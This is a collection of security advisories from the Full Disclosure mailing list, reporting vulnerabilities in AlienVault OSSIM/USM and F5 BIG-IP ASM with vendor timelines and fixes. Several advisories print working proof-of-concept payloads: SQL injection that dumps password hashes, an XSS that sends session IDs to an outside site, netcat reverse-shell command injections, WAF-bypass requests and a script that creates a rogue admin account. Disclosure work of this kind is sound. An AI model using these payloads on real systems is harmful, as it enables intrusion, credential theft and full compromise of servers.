[FD] CVE-2016-8580 - Alienvault OSSIM/USM Object Injection Vulnerability
Details
===
Product: Alienvault OSSIM/USM
Vulnerability: PHP Object Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8580
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=
A PHP object injection vulnerability exists in multiple widget files
due to the unsafe use of the unserialize() function. The affected
files include flow_chart.php, gauge.php, honeypot.php,
image.php,inventory.php, otx.php, rss.php, security.php, siem.php,
taxonomy.php, tickets.php, and url.php.
An authenticated attacker could send a serialized PHP object to one of
the vulnerable pages and potentially gain code execution via magic
methods in included classes.
POC
This benign POC injects the IDS_Report class from PHPIDS into the
refresh parameter of image.php. The __toString method of IDS_Report is
then executed and the output is displayed in the value of the content
field in the response:
/ossim/dashboard/sections/widgets/data/image.php?type=test=blah=1=1=1==1=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}
Timeline
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2016-8581 - Alienvault OSSIM/USM Stored XSS Vulnerability
Details
===
Product: Alienvault OSSIM/USM
Vulnerability: Stored XSS
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8581
CVSS: 3.5
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=
A stored XSS vulnerability exists in the User-Agent header of the
login process. It's possible to inject a script into that header that
then gets executed when mousing over the User-Agent field in Settings
-> Current Sessions.
POC
===
The POC uses jQuery to send all session IDs on the "Current Sessions"
page to an arbitrary site (Google, in this case)
$('#ops_table
.ops_id').each(function(){$.get("<a rel="nofollow" href="https://www.google.com/",{session:">https://www.google.com/",{session:</a>($(this).html())});});
Timeline
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2016-8582 - Alienvault OSSIM/USM SQL Injection Vulnerability
Details
===
Product: Alienvault OSSIM/USM
Vulnerability: SQL Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8582
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=
A SQL injection vulnerability exists in the value parameter of
/ossim/dashboard/sections/widgets/data/gauge.php on line 231. By
sending a serialized array with a SQL query in the type field, it's
possible to execute an arbitrary SQL query. The result is not
displayed on the screen, but it can be exploited as a blind SQLi or
have the output directed to a file and then retrieved via another
request. Authentication is required.
POC
===
This request will dump user password hashes to a file:
/ossim/dashboard/sections/widgets/data/gauge.php?=alarm=blah=1=1=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F10.0.0.123_pass_tshark.pcap%27--+-%22%3B%7D
The file containing the output can then be retrieved with the following request:
/ossim/pcap/download.php?scan_name=pass_ip=10.0.0.123
It's also possible to read the contents of any file readable by the
mysql user by using mysql's load_file function. For example, changing
the request to something like select load_file('/etc/passwd') .
Timeline
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2016-8583 - Alienvault OSSIM/USM Reflected XSS
Details === Product: Alienvault OSSIM/USM Vulnerability: Reflected XSS Author: Peter Lapp, lappsec () gmail com CVE: CVE-2016-8583 Vulnerable Versions: <=5.3.1 Fixed Version: 5.3.2 Vulnerability Details = Multiple GET parameters in the vulnerability scan scheduler of OSSIM/USM before 5.3.2 are vulnerable to reflected XSS. The parameters include jobname, timeout, sched_id, and targets[] in /ossim/vulnmeter/sched.php. POC === Example payload is: "><body+onpageshow%3d"alert(0) For the targets[] param the payload is slightly different. Timeline 08/03/16 - Reported to Vendor 10/03/16 - Fixed in version 5.3.2 References == https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Alienvault OSSIM/USM Multiple Vulnerabilities
Shortly after I posted this I received an email from Alienvault
stating that a fix is imminent and is planned to be released next week
in version 5.0.2.
Thanks to AV for getting back to me on this.
On Tue, May 5, 2015 at 9:21 PM, Peter Lapp lapp...@gmail.com wrote:
Details
===
Product: Alienvault OSSIM/USM
Vulnerability: Multiple Vulnerabilities (XSS, SQLi, Command Execution)
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Tested on 4.14, 4.15, and 5.0. It likely affects
all previous versions as well.
Fixed Version: No fix has been released.
Summary
===
Alienvault OSSIM is an open source SIEM solution designed to collect
and correlate log data. The vulnerability management section of the UI
allows a user to upload a Nessus scan in NBE format. Using a specially
crafted NBE file, a user can exploit multiple vulnerabilities such as
XSS, SQLi, and Command Execution. Authentication is required to
exploit this vulnerability, but admin privileges are not required. Any
user with access to the Vulnerabilities page can perform these
attacks.
The vendor was notified almost 5 months ago about this vulnerability.
Given that they have not responded to my recent requests for updates
and just released a major version that did not patch these issues, I
have decided to release the details.
Technical Details
=
Various fields within the NBE file can be manipulated to exploit
certain vulnerabilities. A pretty bare template that I used to test
these issues looked something like this:
timestamps|||scan_start|Thu Dec 11 17:00:51 2014|
timestamps||1.1.1.1|host_start|Thu Dec 11 17:00:52 2014|
results|1.1.1.1|1.1.1.1|cifs (445/tcp)|1234|Security Hole|Synopsis
:\n\nThe remote host contains a web browser that is affected by
multiple vulnerabilities.\nOther references :
OSVDB:113197,OSVDB:113198,OSVDB:113199,OSVDB:115035\n
timestamps||1.1.1.1|host_end|Thu Dec 11 17:11:58 2014|
timestamps|||scan_end|Thu Dec 11 17:16:44 2014|
Reflective XSS
--
The hostname/IP portion of the NBE import is vulnerable. Putting
scriptalert(0)/script directly after the hostname/IP in the NBE
will result in the javascript being reflected back when the import
finishes.
Stored XSS
--
The plugin ID portion of the NBE is vulnerable.
Addingscriptalert(document.cookie)/script to the plugin ID in the
NBE will result in the script being executed every time someone views
the HTML report in the OSSIM interface.
Blind SQL Injection
---
The plugin ID is also vulnerable to blind SQLi. Adding ' UNION SELECT
SLEEP(20) AND '1'='1 to the plugin ID will cause the DB to sleep for
20 seconds.
SQL Injection
-
The protocol portion of the NBE is vulnerable to SQL injection.
Take this:
cifs (445/tcp)
And turn it to this:
cifs','0','1(',(select/**/pass/**/from/**/users/**/where/**/login=admin),'N');#
(445/tcp)
That will result in the hash of the admin password being included in
the report. The extra '(' in '1(' is required for the ending ) in
order to not cause an error in the Perl script that runs the import.
Command Injection
-
The hostname/IP portion of the NBE is vulnerable. Adding '#nc -c
/bin/sh 10.10.10.10 ' will result in a reverse shell as www-data
to 10.10.10.10.
The initial # is required to comment out the remainder of a SQL query
that comes before the dig command where this is injected. Without it
the script won't proceed to the required point.
Solution
There's no official patch for this yet. It is possible to restrict
access to the Vulnerabilities page via user roles, which should
prevent a user from exploiting this. Also, if you're not using the
import feature, you could rename the Perl script on the file system
that runs the import.
Timeline
01/12/2015 - Notified the vendor of the vulnerabilities.
01/12/2015 - Vendor confirms the issue and files a defect.
01/28/2015 - Requested an update from the vendor and was told the
issue would be worked on in the future.
04/20/2015 - Requested an update and informed the vendor of my intent
to release the details. No response.
05/05/2015 - Released details to FD.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Alienvault OSSIM/USM Multiple Vulnerabilities
Details
===
Product: Alienvault OSSIM/USM
Vulnerability: Multiple Vulnerabilities (XSS, SQLi, Command Execution)
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Tested on 4.14, 4.15, and 5.0. It likely affects
all previous versions as well.
Fixed Version: No fix has been released.
Summary
===
Alienvault OSSIM is an open source SIEM solution designed to collect
and correlate log data. The vulnerability management section of the UI
allows a user to upload a Nessus scan in NBE format. Using a specially
crafted NBE file, a user can exploit multiple vulnerabilities such as
XSS, SQLi, and Command Execution. Authentication is required to
exploit this vulnerability, but admin privileges are not required. Any
user with access to the Vulnerabilities page can perform these
attacks.
The vendor was notified almost 5 months ago about this vulnerability.
Given that they have not responded to my recent requests for updates
and just released a major version that did not patch these issues, I
have decided to release the details.
Technical Details
=
Various fields within the NBE file can be manipulated to exploit
certain vulnerabilities. A pretty bare template that I used to test
these issues looked something like this:
timestamps|||scan_start|Thu Dec 11 17:00:51 2014|
timestamps||1.1.1.1|host_start|Thu Dec 11 17:00:52 2014|
results|1.1.1.1|1.1.1.1|cifs (445/tcp)|1234|Security Hole|Synopsis
:\n\nThe remote host contains a web browser that is affected by
multiple vulnerabilities.\nOther references :
OSVDB:113197,OSVDB:113198,OSVDB:113199,OSVDB:115035\n
timestamps||1.1.1.1|host_end|Thu Dec 11 17:11:58 2014|
timestamps|||scan_end|Thu Dec 11 17:16:44 2014|
Reflective XSS
--
The hostname/IP portion of the NBE import is vulnerable. Putting
scriptalert(0)/script directly after the hostname/IP in the NBE
will result in the javascript being reflected back when the import
finishes.
Stored XSS
--
The plugin ID portion of the NBE is vulnerable.
Addingscriptalert(document.cookie)/script to the plugin ID in the
NBE will result in the script being executed every time someone views
the HTML report in the OSSIM interface.
Blind SQL Injection
---
The plugin ID is also vulnerable to blind SQLi. Adding ' UNION SELECT
SLEEP(20) AND '1'='1 to the plugin ID will cause the DB to sleep for
20 seconds.
SQL Injection
-
The protocol portion of the NBE is vulnerable to SQL injection.
Take this:
cifs (445/tcp)
And turn it to this:
cifs','0','1(',(select/**/pass/**/from/**/users/**/where/**/login=admin),'N');#
(445/tcp)
That will result in the hash of the admin password being included in
the report. The extra '(' in '1(' is required for the ending ) in
order to not cause an error in the Perl script that runs the import.
Command Injection
-
The hostname/IP portion of the NBE is vulnerable. Adding '#nc -c
/bin/sh 10.10.10.10 ' will result in a reverse shell as www-data
to 10.10.10.10.
The initial # is required to comment out the remainder of a SQL query
that comes before the dig command where this is injected. Without it
the script won't proceed to the required point.
Solution
There's no official patch for this yet. It is possible to restrict
access to the Vulnerabilities page via user roles, which should
prevent a user from exploiting this. Also, if you're not using the
import feature, you could rename the Perl script on the file system
that runs the import.
Timeline
01/12/2015 - Notified the vendor of the vulnerabilities.
01/12/2015 - Vendor confirms the issue and files a defect.
01/28/2015 - Requested an update from the vendor and was told the
issue would be worked on in the future.
04/20/2015 - Requested an update and informed the vendor of my intent
to release the details. No response.
05/05/2015 - Released details to FD.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] F5 ASM JSON Profile Bypass
Details
===
Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Web Application Firewall Bypass
Author: Peter Lapp, lappsec () gmail com
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Should apply to all releases.
Fixed Version: None
Summary
===
The F5 ASM is a web application firewall designed to protect web
applications from attacks. Due to the way that the system processes
JSON content, it's possible to bypass the ASM using a crafted request
to a URL that processes both JSON and regular URL encoded requests.
The vendor has acknowledged that this is an issue and has indicated
that a fix will be released sometime in the future, but doesn't have a
time frame and it's not a priority. I decided to release the details
so anyone with a vulnerable configuration is aware of the risk and can
act accordingly.
Technical Details
=
The problem is that the ASM's JSON parser does not normalize URL
encoded content. So it will block script, but not %3cscript%3e. This
is fine unless you have a JSON profile applied to a URL that also
processes normal x-www-form-urlencoded POST requests. In this case,
it's possible to trick the ASM into thinking the request is JSON, URL
encode your payload, and slip it through to the application.
Granted, this bypass is limited to a specific configuration, but it's
really not that uncommon to have a JSON profile applied to a URL that
also processes other data. Possible scenarios include a generic JSON
catchall, one automatically created by the policy builder, or you may
have a web application that uses parameter based navigation (page=json
goes to one page, page=search goes to another). In any case, if you
have a JSON profile applied to a URL that also handles POST requests
with x-www-form-urlencoded content, you're vulnerable.
First, in order to bypass the ASM, you have to trick it into thinking
the request content is JSON. In F5's documentation
(https://support.f5.com/kb/en-us/products/big-ip_asm/manuals/product/asm-implementations-11-4-0/14.html),
they recommend matching *json* in the Content-Type header. This is
easily tricked by setting the header to Content-Type:
application/x-www-form-urlencoded; charset=UTF-8;json.
I then tested setting it to only match on application/json, but that
was still tricked by dual content-type headers:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Type: application/json
The application (running on Tomcat) processed the request as
urlencoded, but the ASM processed it as JSON.
From here, passing through a malicious payload depends on the
violations that are enabled on the security profile. If Malformed JSON
is NOT enabled, you can just tag json onto the end of the content
header(or double the header), URL encode special characters in your
payload and send it away. In this case, a request like the following
would not be blocked:
POST / HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Content-Length: 168
Content-Type: application/x-www-form-urlencoded; charset=UTF-8;json
search=%3cimg+src%3dx+onerror%3alert%280%29%3e
If Malformed JSON violations are enabled, then the payload has to be
valid JSON. A request like the one below will get past that. It's not
pretty but it works. This request will get past the ASM with all the
bells and whistles enabled.
POST / HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Content-Length: 168
Content-Type: application/x-www-form-urlencoded; charset=UTF-8;json
{junkparam=search=%3cimg+src%3dx+onerror%3dalert%280%29%3ejunkparam2=:junk}
The ASM parses that as JSON and it is well formed so there aren't any
errors. But the application is processing it as x-www-form-urlencoded
so {junkparam is just treated as a regular parameter name and the
second parameter with the payload in it gets through. The last
parameter is there just to close out the JSON format.
Also, because JSON profiles don't check for meta characters in
parameter names, it doesn't trigger an Illegal meta character in
parameter name violation. If the payload looked like this
{param:junkparam=locationFilter=%3cimg+src%3dx+onerror%3dalert%280%29%3ejunkparam2=}
then it would still get through but only if the illegal meta character
in value violation was not set to block.
Right now there is no fix for this issue and I haven't been able to
find a way to block a request like the one above from getting through.
I consulted F5's engineers and they said this was by design and
there's no way to block it as of now. There will be a fix for this in
the future, but until then make sure that your ASM profiles are as
explicit as possible and you have compensating security controls for
any URLs that this bypass would apply to. It's just another reason not
to use a WAF as a band-aid for a vulnerable application!
Feel free to contact me if you have any questions or additional
information to add to this.
Timeline
1/19/2015 - Reported the issue to the vendor
2/26/2015
[FD] Alienvault OSSIM/USM Command Execution Vulnerability
Details === Product: Alienvault OSSIM/USM Vulnerability: Command Execution Author: Peter Lapp, lapp...@gmail.com CVE: None assigned Vulnerable Versions: =4.14.X Fixed Version: 4.15.0 Summary === Alienvault OSSIM is an open source SIEM solution designed to collect and correlate log data. The automatic deployment option for OSSEC agents is vulnerable to command execution as root. Authentication to the web UI is required to exploit this vulnerability. Technical Details and POC = The web UI allows a user to automatically deploy OSSEC agents to Windows hosts when supplied with a username and password. The username and password are passed unfiltered to a command that runs as root. By simply providing a password of fakepass | nc -c /bin/sh X.X.X.X 1234 | a reverse shell is created and root access to the operating system is obtained. The user.log shows the input as it is passed to the command: Dec 18 16:42:28 ossim-server ansible-command: Invoked with executable=/bin/bash shell=True args= program_files_x86=$(winexe --user=/test%fakepass | nc -c /bin/sh 10.10.10.10 1234 | //10.10.10.199 'cmd /c set' | grep ^ProgramFiles(x86)= | cut -d'=' -f 2-); program_files_x64=$(winexe --user=/test%fakepass | nc -c /bin/sh 10.10.10.10 1234 | //10.10.10.199 'cmd /c set' | grep ^ProgramFiles= | cut -d'=' -f 2-); [[ $program_files_x86 ]] echo $program_files_x86 || echo $program_files_x64 removes=None creates=None chdir=None Solution Upgrade to v4.15 References == https://www.alienvault.com/forums/discussion/4414/alienvault-v4-15-functional-release (ENG-98338) Timeline 12/18/14 - Reported the vulnerability to the vendor and received confirmation that a defect was filed. 01/14/15 - Vendor confirmed the issue was fixed and patch available. 01/15/15 - Confirmed vulnerability was no longer exploitable and released info. ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Stored XSS Vulnerability in F5 BIG-IP Application Security Manager
Details
===
Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Cross Site Scripting
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Likely 11.4.x-11.5.x.
Fixed Version: 11.6
Summary
===
The F5 ASM is a web application firewall designed to protect web
applications from attacks. It allows for a custom HTML page to be displayed
to end users when they trigger a violation. The configuration page for the
custom response contains a text input for HTML and a Show button that
allows the editor to preview the page. This functionality is vulnerable to
Cross Site Scripting.
Technical Details and POC
=
The HTML entered into the Response Body area is not sandboxed, which
allows a malicious user to include JavaScript that would run in the context
of the management console whenever a user clicks the Show button. The
user could use XHR to bypass CSRF protections and perform commands on
behalf of anyone that clicks the Show button.
Scenario:
1. A restricted user (Application Security Editor role) logs into the
management console of the ASM, enters Javascript to add a new user (see
below) into the Response Body input, and saves the page.
2. An admin logs on and previews the block page via the Show button.
3. The JS runs in the background, executes the XHR, and adds a new admin
user. The restricted user now has an admin account.
POC (Sloppy, I know):
script
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4)
{
var postrequest = new XMLHttpRequest();
xmlForm = xmlhttp.responseXML.getElementById('myform');
var timenowvalue = encodeURIComponent(xmlForm.elements['_timenow'].value);
var timebeforevalue =
encodeURIComponent(xmlForm.elements['_timenow_before'].value);
var bufvalue = encodeURIComponent(xmlForm.elements['_bufvalue'].value);
var bufvaluebefore =
encodeURIComponent(xmlForm.elements['_bufvalue_before'].value);
var parameters =
_timenow=+timenowvalue+_timenow_before=+timebeforevalue+_bufvalue=+bufvalue+_bufvalue_before=+bufvaluebefore+_form_holder_opener_=handler=%2Ftmui%2Fsystem%2Fuser%2Fcreatehandler_before=%2Ftmui%2Fsystem%2Fuser%2FcreateshowObjList=shell_with_bashshowObjList_before=hideObjList=partition_row%2Cshell_no_bashhideObjList_before=enableObjList=enableObjList_before=disableObjList=disableObjList_before=_bufvalue_validation=NO_VALIDATIONcom.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Fuser%2Fcreatecom.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Fuser%2Fcreatelinked_add_id=linked_add_id_before=exit_page=%2Ftmui%2Fsystem%2Fuser%2Flist.jspexit_page_before=%2Ftmui%2Fsystem%2Fuser%2Flist.jspuser_role_before=900user_role_before_before=900form_page=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3Fform_page_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3Fname=testadminname_before=name_validation=NO_VALIDATIONname_required=1passwd=testing123passw
d_before=passwd_validation=com.f5.form.PasswordValidatorpasswd_validationparam1=passwd_confirmpasswd_required=1passwd_confirm=testing123passwd_confirm_before=passwd_confirm_validation=NO_VALIDATIONpasswd_confirm_required=1user_role=0user_role_before=900shell_with_bash=bashshell_with_bash_before=disableexit_button_before=Cancelrepeat_before=Repeatfinished=Finishedfinished_before=Finished;
postrequest.open(POST, /tmui/Control/form, true)
postrequest.setRequestHeader(Content-type,
application/x-www-form-urlencoded)
postrequest.send(parameters)
}
}
xmlhttp.open(GET, /tmui/Control/jspmap/tmui/system/user/create.jsp,
true);
xmlhttp.responseType = document;
xmlhttp.send();
/script
Solution
Upgrade to 11.6.
The vendor indicated the patch would not be backported to previous versions.
Timeline
06/09/14 - Reported issue to vendor
06/18/14 - Vendor confirms the vulnerability
07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL
would be created for the vulnerability
10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL was
not created and the fix would not be backported.
01/12/14 - Released vulnerability info.
___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] [Corrected] Stored XSS Vulnerability in F5 BIG-IP Application Security Manager
Edit: Corrected the date in the timeline from 01/12/14 to 01/12/15.
Details
===
Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Cross Site Scripting
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Likely 11.4.x-11.5.x.
Fixed Version: 11.6
Summary
===
The F5 ASM is a web application firewall designed to protect web
applications from attacks. It allows for a custom HTML page to be
displayed to end users when they trigger a violation. The
configuration page for the custom response contains a text input for
HTML and a Show button that allows the editor to preview the page.
This functionality is vulnerable to Cross Site Scripting.
Technical Details and POC
=
The HTML entered into the Response Body area is not sandboxed, which
allows a malicious user to include JavaScript that would run in the
context of the management console whenever a user clicks the Show
button. The user could use XHR to bypass CSRF protections and perform
commands on behalf of anyone that clicks the Show button.
Scenario:
1. A restricted user (Application Security Editor role) logs into the
management console of the ASM, enters Javascript to add a new user
(see below) into the Response Body input, and saves the page.
2. An admin logs on and previews the block page via the Show button.
3. The JS runs in the background, executes the XHR, and adds a new
admin user. The restricted user now has an admin account.
POC (Sloppy, I know):
script
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange=
function()
{
if (xmlhttp.readyState==4)
{
var postrequest = new XMLHttpRequest();
xmlForm = xmlhttp.responseXML.getElementById('myform');
var timenowvalue = encodeURIComponent(xmlForm.elements['_timenow'].value);
var timebeforevalue =
encodeURIComponent(xmlForm.elements['_timenow_before'].value);
var bufvalue = encodeURIComponent(xmlForm.elements['_bufvalue'].value);
var bufvaluebefore =
encodeURIComponent(xmlForm.elements['_bufvalue_before'].value);
var parameters =
_timenow=+timenowvalue+_timenow_before=+timebeforevalue+_bufvalue=+bufvalue+_bufvalue_before=+bufvaluebefore+_form_holder_opener_=handler=%2Ftmui%2Fsystem%2Fuser%2Fcreatehandler_before=%2Ftmui%2Fsystem%2Fuser%2FcreateshowObjList=shell_with_bashshowObjList_before=hideObjList=partition_row%2Cshell_no_bashhideObjList_before=enableObjList=enableObjList_before=disableObjList=disableObjList_before=_bufvalue_validation=NO_VALIDATIONcom.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Fuser%2Fcreatecom.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Fuser%2Fcreatelinked_add_id=linked_add_id_before=exit_page=%2Ftmui%2Fsystem%2Fuser%2Flist.jspexit_page_before=%2Ftmui%2Fsystem%2Fuser%2Flist.jspuser_role_before=900user_role_before_before=900form_page=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3Fform_page_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3Fname=testadminname_before=name_validation=NO_VALIDATIONname_required=1passwd=testing123passw
d_before=passwd_validation=com.f5.form.PasswordValidatorpasswd_validationparam1=passwd_confirmpasswd_required=1passwd_confirm=testing123passwd_confirm_before=passwd_confirm_validation=NO_VALIDATIONpasswd_confirm_required=1user_role=0user_role_before=900shell_with_bash=bashshell_with_bash_before=disableexit_button_before=Cancelrepeat_before=Repeatfinished=Finishedfinished_before=Finished;
postrequest.open(POST, /tmui/Control/form, true)
postrequest.setRequestHeader(Content-type,
application/x-www-form-urlencoded)
postrequest.send(parameters)
}
}
xmlhttp.open(GET, /tmui/Control/jspmap/tmui/system/user/create.jsp, true);
xmlhttp.responseType = document;
xmlhttp.send();
/script
Solution
Upgrade to 11.6.
The vendor indicated the patch would not be backported to previous versions.
Timeline
06/09/14 - Reported issue to vendor
06/18/14 - Vendor confirms the vulnerability
07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL
would be created for the vulnerability
10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL
was not created and the fix would not be backported.
01/12/15 - Released vulnerability info.
___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives RSS: http://seclists.org/fulldisclosure/
